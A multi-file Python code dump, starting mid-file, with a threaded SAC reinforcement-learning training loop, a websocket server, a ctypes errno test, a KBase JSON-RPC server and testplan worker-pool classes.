env = Test(name, workers) #0 = right
time.sleep(0.5)
print(threading.current_thread())
print('name', name, 'workers', workers, 'agentID', id(agent))
# if RUN_FLAG[workers].is_set():
# RUN_FLAG[workers].clear()
# else:
# RUN_FLAG[workers].set()
# RUN_FLAG[workers].wait()
t1 = time.time()
while (not COORD.should_stop()) and (not rospy.is_shutdown()):
# if RUN_FLAG[workers].is_set():
# RUN_FLAG[workers].clear()
# else:
# RUN_FLAG[workers].set()
# RUN_FLAG[workers].wait()
s_arr = []
a_arr = []
r_arr = []
s__arr = []
done_arr = []
img_arr = []
s = []
time.sleep(1)
s = env.reset()
ep_reward = 0
success_cnt = 0
done_cnt = 0
EP[name] += 1
ep = EP[name]
SUCCESS_ARRAY[name, ep%500] = 0.
# COLLISION = False
first_fail = True
for j in range(MAX_EP_STEPS):
WORKER_EVENT[name].wait()
# s = s.tolist()
a = agent.choose_action(s)
rd = np.random.rand()
a *= (rd*3+0.5)
s_, r, done, success, fail = env.step(a)
# , succcccccccccccccckkkkk
if j>10:
s_arr.append(s)
a_arr.append(a)
r_arr.append(r)
s__arr.append(s_)
# img_arr.append(succcccccccccccccckkkkk)
done_arr.append(done)
# agent.replay_buffer[workers].store_transition(s, a, r, s_, done)
# if fail:
# if first_fail:
# first_fail = False
# for k in range(50):
# if k>=len(r_arr):
# break
# r_arr[-k-1] -= (2-(k*0.04))
# else:
# r_arr[-1] -= 2
success_cnt += int(success)
done_cnt += int(done)
# if collision:
# COLLISION = True
s = s_
ep_reward += r
COUNTER[name]+=1
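            # Periodically gate the acting loop on WORKER_EVENT while the agent
            # performs a few gradient updates, then release it.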
if COUNTER[name] >= BATCH_SIZE*32 and COUNTER[name]%(50) == 0:
WORKER_EVENT[name].clear()
for _ in range(2+int(ep/1000)):
agent.learn(TRAIN_CNT[name])
TRAIN_CNT[name]+=1
WORKER_EVENT[name].set()
# LEARN_EVENT[name].set()
if success_cnt > 0:
# if not COLLISION:
SUCCESS_ARRAY[name, ep%500] = 1.
break
if fail:
break
for i in range(len(s_arr)):
agent.replay_buffer[workers].store_transition(s_arr[i], a_arr[i], r_arr[i], s__arr[i], done_arr[i])
s_arr.clear()
a_arr.clear()
r_arr.clear()
s__arr.clear()
done_arr.clear()
SUCCESS_RATE = 0
for z in SUCCESS_ARRAY[name]:
SUCCESS_RATE += z/5
if SUCCESS_RATE >= GOAL_RATE[name]:
SAVE[name] = True
else:
SAVE[name] = False
agent.replay_buffer[workers].store_eprwd(ep_reward*j/100)
if workers == 0 and SAVE[name]:
SUCCESS_ARRAY[name] = np.zeros([500])
save(agent, name)
print('Running time: ', time.time() - t1)
if env.is_success:
print(SIDE_[name]+str(workers), ep, ' Reward: %i' % int(ep_reward), 'cnt: ',j, 's_rate: ', int(SUCCESS_RATE), 'sssuuucccccceeessssss ', env.success_cnt)
else:
print(SIDE_[name]+str(workers), ep, ' Reward: %i' % int(ep_reward), 'cnt: ',j, 's_rate: ', int(SUCCESS_RATE))
def save(agent, name):
print(agent.path)
if os.path.isdir(agent.path+str(GOAL_RATE[name])): shutil.rmtree(agent.path+str(GOAL_RATE[name]))
os.mkdir(agent.path+str(GOAL_RATE[name]))
ckpt_path = os.path.join(agent.path+str(GOAL_RATE[name]), 'SAC.ckpt')
save_path = agent.saver.save(agent.sess, ckpt_path, write_meta_graph=False)
print("\nSave Model %s\n" % save_path)
if GOAL_RATE[name] < 90:
GOAL_RATE[name] += 10
else:
GOAL_RATE[name] += 2
if GOAL_RATE[name] > 100:
COORD.request_stop()
def train(name):
global SAVE, COUNTER, RUN_FLAG
threads_ = []
print(threading.current_thread())
env = Test(name, 0)
agent = SAC(act_dim=env.act_dim, obs_dim=env.obs_dim, depth_dim=env.depth_dim,
                lr_actor=2e-4, lr_value=2e-4, gamma=0.99, tau=0.995, buffers=WORKS, name=SIDE[name], seed=name)
# lr_actor=1e-3, lr_value=1e-3
env = None
print('name', name, 'agentID', id(agent))
for j in range(WORKS):
t = threading.Thread(target=worker, args=(name, j, agent,))
threads_.append(t)
if name == 0:
RUN_FLAG.append(threading.Event())
RUN_FLAG[j].set()
time.sleep(1)
for i in threads_:
i.start()
if __name__ == '__main__':
rospy.init_node('a')
threads = []
RUN_FLAG = []
LEARN_EVENT = [threading.Event(), threading.Event()]
WORKER_EVENT = [threading.Event(), threading.Event()]
COORD = tf.train.Coordinator()
for i in range(1):
t = threading.Thread(target=train, args=(i,))
threads.append(t)
WORKER_EVENT[i].set()
LEARN_EVENT[i].clear()
for i in threads:
i.start()
time.sleep(10)
print(threading.current_thread())
COORD.join(threads)
|
ws.py
|
# -*- coding: utf-8 -*-
"""This code is not a bit production-ready, just a pimped imitation of uWSGI server behavior
"""
import logging
import time
from multiprocessing import Process
from wsgiref.simple_server import make_server
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import WSGIServer, WebSocketWSGIRequestHandler
from ws4py.server.wsgiutils import WebSocketWSGIApplication
log = logging.getLogger('symmrpc')
connected = False
class DummyWebSocketWSGIRequestHandler(WebSocketWSGIRequestHandler):
def handle(self):
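        # Only the first websocket client is served; the flag is never reset,
        # so later connection attempts are simply logged as busy.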
global connected
if not connected:
connected = True
WebSocketWSGIRequestHandler.handle(self)
else:
log.debug('busy by other client')
init_worker = None
class MyWebSocket(WebSocket):
def opened(self):
global init_worker
log.debug('Socket opened')
self.recv_data = init_worker(lambda x: self.send(x, binary=True))
def received_message(self, message):
# log.debug('Server websocket received')
# TODO: check message.is_binary
self.recv_data(message.data)
def closed(self, code, reason):
log.debug('Socket closed %s %s', code, reason)
def start_worker(server, worker_num, init_worker_proc):
    global init_worker
    init_worker = init_worker_proc
log.debug('starting worker %d', worker_num)
try:
server.initialize_websockets_manager()
server.serve_forever()
except KeyboardInterrupt:
pass
log.debug('shut down worker %d', worker_num)
def master(count, host, port, init_worker_proc):
worker_server = make_server(host, port, server_class=WSGIServer,
handler_class=DummyWebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=MyWebSocket))
workers = [None] * count
for i in range(count):
workers[i] = Process(target=start_worker, args=(worker_server, i + 1, init_worker_proc))
workers[i].start()
while True:
time.sleep(1)
for i in range(count):
if not workers[i].is_alive():
log.debug('worker %d is dead', (i + 1))
workers[i] = Process(target=start_worker, args=(worker_server, i + 1, init_worker_proc))
workers[i].start()
def run_workers(host, port, count, init_worker_proc):
process = Process(target=master, args=(count, host, port, init_worker_proc))
process.start()
return process
|
test_errno.py
|
import unittest, os, errno
from ctypes import *
from ctypes.util import find_library
import threading
class Test(unittest.TestCase):
def test_open(self):
libc_name = find_library("c")
if libc_name is not None:
libc = CDLL(libc_name, use_errno=True)
if os.name == "nt":
libc_open = libc._open
else:
libc_open = libc.open
libc_open.argtypes = c_char_p, c_int
self.failUnlessEqual(libc_open("", 0), -1)
self.failUnlessEqual(get_errno(), errno.ENOENT)
self.failUnlessEqual(set_errno(32), errno.ENOENT)
self.failUnlessEqual(get_errno(), 32)
def _worker():
set_errno(0)
libc = CDLL(libc_name, use_errno=False)
if os.name == "nt":
libc_open = libc._open
else:
libc_open = libc.open
libc_open.argtypes = c_char_p, c_int
self.failUnlessEqual(libc_open("", 0), -1)
self.failUnlessEqual(get_errno(), 0)
t = threading.Thread(target=_worker)
t.start()
t.join()
self.failUnlessEqual(get_errno(), 32)
set_errno(0)
if os.name == "nt":
def test_GetLastError(self):
dll = WinDLL("kernel32", use_last_error=True)
GetModuleHandle = dll.GetModuleHandleA
GetModuleHandle.argtypes = [c_wchar_p]
self.failUnlessEqual(0, GetModuleHandle("foo"))
self.failUnlessEqual(get_last_error(), 126)
self.failUnlessEqual(set_last_error(32), 126)
self.failUnlessEqual(get_last_error(), 32)
def _worker():
set_last_error(0)
dll = WinDLL("kernel32", use_last_error=False)
GetModuleHandle = dll.GetModuleHandleW
GetModuleHandle.argtypes = [c_wchar_p]
GetModuleHandle("bar")
self.failUnlessEqual(get_last_error(), 0)
t = threading.Thread(target=_worker)
t.start()
t.join()
self.failUnlessEqual(get_last_error(), 32)
set_last_error(0)
if __name__ == "__main__":
unittest.main()
|
kb_MiniASMServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from kb_MiniASM.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'kb_MiniASM'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from kb_MiniASM.kb_MiniASMImpl import kb_MiniASM # noqa @IgnorePep8
impl_kb_MiniASM = kb_MiniASM(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
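    # Prefer proxy-supplied headers (X-Forwarded-For / X-Real-IP) unless the
    # config explicitly disables trusting them, falling back to REMOTE_ADDR.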
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'kb_MiniASM'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_kb_MiniASM.run_MiniASM,
name='kb_MiniASM.run_MiniASM',
types=[dict])
self.method_authentication['kb_MiniASM.run_MiniASM'] = 'required' # noqa
self.rpc_service.add(impl_kb_MiniASM.status,
name='kb_MiniASM.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'kb_MiniASM ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
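        # Round the local-to-UTC offset to the nearest minute, then split it
        # into the hour/minute components of the "+HH:MM" suffix.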
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
will also allow returning of the port number.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print "Listening on port %s" % port
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print "Host set to %s" % host
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print "Listening on port %s" % port
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
base.py
|
"""Worker pool executor base classes."""
import os
import numbers
import threading
import time
import datetime
import pprint
import traceback
import queue
from schema import Or, And, Use
from testplan.common.config import ConfigOption, validate_func
from testplan.common import entity
from testplan.common.remote.remote_resource import RemoteResource
from testplan.common.utils.path import rebase_path
from testplan.common.utils.thread import interruptible_join
from testplan.common.utils.timing import wait_until_predicate
from testplan.common.utils import strings
from testplan.runners.base import Executor, ExecutorConfig
from testplan.report import ReportCategories
from .communication import Message
from .connection import QueueClient, QueueServer
from .tasks import Task, TaskResult
from testplan.common.entity import ResourceStatus
class TaskQueue:
"""
    A priority queue that returns items in ascending order of priority.
    Items with the same priority are returned in the order they were added.
"""
def __init__(self):
self.q = queue.PriorityQueue()
self.count = 0
def put(self, priority, item):
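        # The monotonically increasing count breaks ties so that items with
        # equal priority are dequeued in insertion (FIFO) order.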
self.q.put((priority, self.count, item))
self.count += 1
def get(self):
entry = self.q.get_nowait()
return entry[0], entry[2]
def __getattr__(self, name):
return self.q.__getattribute__(name)
class WorkerConfig(entity.ResourceConfig):
"""
Configuration object for
:py:class:`~testplan.runners.pools.base.Worker` resource entity.
"""
@classmethod
def get_options(cls):
"""
Schema for options validation and assignment of default values.
"""
return {
"index": Or(int, str),
ConfigOption("transport", default=QueueClient): object,
ConfigOption("restart_count", default=3): int,
}
class Worker(entity.Resource):
"""
Worker resource that pulls tasks from the transport provided, executes them
and sends back task results.
:param index: Worker index id.
:type index: ``int`` or ``str``
:param transport: Transport class for pool/worker communication.
:type transport: :py:class:`~testplan.runners.pools.connection.Client`
:param restart_count: How many times a worker in pool can be restarted.
:type restart_count: ``int``
Also inherits all :py:class:`~testplan.common.entity.base.Resource`
options.
"""
CONFIG = WorkerConfig
def __init__(self, **options):
super(Worker, self).__init__(**options)
self._metadata = None
self._transport = self.cfg.transport()
self._handler = None
self.last_heartbeat = None
self.assigned = set()
self.requesting = 0
self.restart_count = self.cfg.restart_count
@property
def handler(self):
return self._handler
@property
def transport(self):
"""Pool/Worker communication transport."""
return self._transport
@property
def metadata(self):
"""Worker metadata information."""
if not self._metadata:
self._metadata = {
"thread": threading.current_thread(),
"index": self.cfg.index,
}
return self._metadata
@property
def outfile(self):
"""Stdout file."""
return os.path.join(
self.parent.runpath, "{}_startup".format(self.cfg.index)
)
def uid(self):
"""Worker unique index."""
return self.cfg.index
def starting(self):
"""Starts the daemonic worker loop."""
self.make_runpath_dirs()
self._handler = threading.Thread(
target=self._loop, args=(self._transport,)
)
self._handler.daemon = True
self._handler.start()
self.status.change(self.STATUS.STARTED)
def stopping(self):
"""Stops the worker."""
if self._handler:
interruptible_join(self._handler)
self._handler = None
self.status.change(self.STATUS.STOPPED)
def aborting(self):
"""Aborting logic, will not wait running tasks."""
self._transport.disconnect()
@property
def is_alive(self):
"""Poll the loop handler thread to check it is running as expected."""
return self._handler.is_alive()
def _loop(self, transport):
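        # Worker loop: keep pulling tasks from the pool over the transport,
        # execute them, and send the results back until told to stop.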
message = Message(**self.metadata)
while self.active and self.status.tag not in (
self.status.STOPPING,
self.status.STOPPED,
):
received = transport.send_and_receive(
message.make(message.TaskPullRequest, data=1)
)
if received is None or received.cmd == Message.Stop:
break
elif received.cmd == Message.TaskSending:
results = []
for item in received.data:
results.append(self.execute(item))
transport.send_and_receive(
message.make(message.TaskResults, data=results),
expect=message.Ack,
)
elif received.cmd == Message.Ack:
pass
time.sleep(self.cfg.active_loop_sleep)
def execute(self, task):
"""
        Executes a task and returns the associated task result.
:param task: Task that worker pulled for execution.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:return: Task result.
:rtype: :py:class:`~testplan.runners.pools.tasks.base.TaskResult`
"""
try:
runnable = task.materialize()
if isinstance(runnable, entity.Runnable):
if not runnable.parent:
runnable.parent = self
if not runnable.cfg.parent:
runnable.cfg.parent = self.cfg
result = runnable.run()
except BaseException:
task_result = TaskResult(
task=task,
result=None,
status=False,
reason=traceback.format_exc(),
)
else:
task_result = TaskResult(task=task, result=result, status=True)
return task_result
def respond(self, msg):
"""
Method that the pool uses to respond with a message to the worker.
:param msg: Response message.
:type msg: :py:class:`~testplan.runners.pools.communication.Message`
"""
self._transport.respond(msg)
def __repr__(self):
return "{}[{}]".format(self.__class__.__name__, self.cfg.index)
class PoolConfig(ExecutorConfig):
"""
Configuration object for
:py:class:`~testplan.runners.pools.base.Pool` executor resource entity.
"""
@classmethod
def get_options(cls):
"""
Schema for options validation and assignment of default values.
"""
return {
"name": str,
ConfigOption("size", default=4): And(int, lambda x: x > 0),
ConfigOption("worker_type", default=Worker): object,
ConfigOption("worker_heartbeat", default=None): Or(
int, float, None
),
ConfigOption("heartbeats_miss_limit", default=3): int,
ConfigOption("restart_count", default=3): int,
ConfigOption("max_active_loop_sleep", default=5): numbers.Number,
ConfigOption("allow_task_rerun", default=True): bool,
}
class Pool(Executor):
"""
Pool task executor object that initializes workers and dispatches tasks.
:param name: Pool name.
:type name: ``str``
:param size: Pool workers size. Default: 4
:type size: ``int``
:param worker_type: Type of worker to be initialized.
:type worker_type: :py:class:`~testplan.runners.pools.base.Worker`
:param worker_heartbeat: Worker heartbeat period.
:type worker_heartbeat: ``int`` or ``float`` or ``NoneType``
:param heartbeats_miss_limit: Maximum times a heartbeat is missed.
:type heartbeats_miss_limit: ``int``
:param restart_count: How many times a worker in pool can be restarted.
:type restart_count: ``int``
:param max_active_loop_sleep: Maximum value for delay logic in active sleep.
:type max_active_loop_sleep: ``int`` or ``float``
:param allow_task_rerun: Whether allow task to rerun when executing in this pool
:type allow_task_rerun: ``bool``
Also inherits all :py:class:`~testplan.runners.base.Executor` options.
"""
CONFIG = PoolConfig
CONN_MANAGER = QueueServer
def __init__(
self,
name,
size=4,
worker_type=Worker,
worker_heartbeat=None,
heartbeats_miss_limit=3,
restart_count=3,
max_active_loop_sleep=5,
allow_task_rerun=True,
**options
):
options.update(self.filter_locals(locals()))
super(Pool, self).__init__(**options)
self.unassigned = TaskQueue() # unassigned tasks
self._executed_tests = []
self._task_retries_cnt = {} # uid: times_reassigned_without_result
self._task_retries_limit = 2
self._workers = entity.Environment(parent=self)
self._workers_last_result = {}
self._conn = self.CONN_MANAGER()
self._conn.parent = self
self._pool_lock = threading.Lock()
self._metadata = None
# Set when Pool is started.
self._exit_loop = False
self._start_monitor_thread = True
# Methods for handling different Message types. These are expected to
# take the worker, request and response objects as the only required
# positional args.
self._request_handlers = {
Message.ConfigRequest: self._handle_cfg_request,
Message.TaskPullRequest: self._handle_taskpull_request,
Message.TaskResults: self._handle_taskresults,
Message.Heartbeat: self._handle_heartbeat,
Message.SetupFailed: self._handle_setupfailed,
}
def uid(self):
"""Pool name."""
return self.cfg.name
def add(self, task, uid):
"""
Add a task for execution.
:param task: Task to be scheduled to workers.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
:param uid: Task uid.
:type uid: ``str``
"""
if not isinstance(task, Task):
raise ValueError(
"Task was expected, got {} instead.".format(type(task))
)
super(Pool, self).add(task, uid)
self.unassigned.put(task.priority, uid)
self._task_retries_cnt[uid] = 0
def _can_assign_task(self, task):
"""
Is this pool able to execute the task.
:param task: Task to be scheduled to pool.
:type task: :py:class:`~testplan.runners.pools.tasks.base.Task`
